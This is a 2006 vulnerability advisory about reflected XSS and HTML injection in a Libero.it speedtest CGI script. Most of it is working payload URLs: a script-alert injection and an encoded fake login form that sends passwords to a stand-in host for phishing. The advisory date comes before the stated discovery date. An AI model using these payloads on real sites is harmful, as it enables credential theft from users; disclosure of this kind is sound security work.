--Security Report-- Advisory: libero.it XSS vulnerability - HTML injection --- Author: Davide Denicolo --- Date: 28/04/06 --- Contact: davide<at>securityinfos.com --- Vendor: ItaliaOnLine S.r.l (http://www.libero.it) Service: Web Level: Low --- Description: Libero.it is a Web portal of big Italian ISP: ItaliaOnLine offering dial-up,Broadband and talk services. A Broadband service called "Libero speedtest" is a simple "Bandwidth Speed Test"; A java applet test, send Bandwidth information to perl script (print_result_spt.pl) in the GET request and this perl script simply put parameter in the page as HTML; an attacker can exploit the vulnerable script to have arbitrary script code executed in the browser or injects html form so redirect a login authentication to another web application; this is a normal HTTP URL: http://assistenza.libero.it/cgi-bin/print_result_spt.pl?down=868.02&up=220.5 3&tdown=18875&tup=74297&size=2048.0&t=0 this is a XSS URL: http://assistenza.libero.it/cgi-bin/print_result_spt.pl?down=4742.11&up=<scr ipt>alert('ciao')</script>&tdown=3455&tup=5107&size=2048.0&t=0 and this is an HTML form : <table border="0" width="32%"> <form method="POST" action="http://127.0.0.1";> <tr> <td width="19%"> <input type="text" name="T2" style="font-size:7pt"> </td> <td width="81%"> <select size="1" name="D1" style="font-size:8pt"> <option value="1">@libero.it</option> <option value="2">@inwind.it</option> <option value="4">@iol.it</option> <option value="66">@blu.it</option> </select> </td> </tr> <tr> <td width="19%"> <input type="password" name="T3" style="font-size:7pt"> </td> <td> <p> <input tabindex="4" value="Entra" name="Act_Login" src="http://www.libero.it/i05/entra_hp.gif"; alt="Entra" border="0" height="22" type="image" width="44"> </p> </td> </tr> </form> </table> and this is previous form injects in the request: http://assistenza.libero.it/cgi-bin/print_result_spt.pl?down=4742.11&up=<tab le%20border="0"%20width="32%"><form%20method="POST"%20action="http://127.0.0 .1"><tr><td%20width="19%"><input%20type="text"%20name="T2"%20style="font-siz e:7pt"></td><td%20width="81%"><select%20size="1"%20name="D1"%20style="font-s ize:8pt"><option%20value="1">@libero.it</option><option%20value="2">@inwind. it</option><option%20value="4">@iol.it</option><option%20value="66">@blu.it< /option></select></td></tr><tr><td%20width="19%"><input%20type="password"%20 name="T3"%20style="font-size:7pt"></td><td><p><input%20tabindex="4"%20value= "Entra"%20name="Act_Login"%20src="http://www.libero.it/i05/entra_hp.gif"%20a lt="Entra"%20border="0"%20height="22"%20type="image"%20width="44"></p></td>< /tr></form></table>&tdown=3455&tup=5107&size=2048.0&t=0 -- Timeline: * 2/05/2006: Vulnerability found. * 2/05/2006: Unable to contact vendor -- For more information, please send question to: davide<at>secutityinfos.com
![http://www.libero.it/i05/entra_hp.gif"](http://www.libero.it/i05/entra_hp.gif"){kind=link}
![http://www.libero.it/i05/entra_hp.gif"%20a](http://www.libero.it/i05/entra_hp.gif"%20a){kind=link}
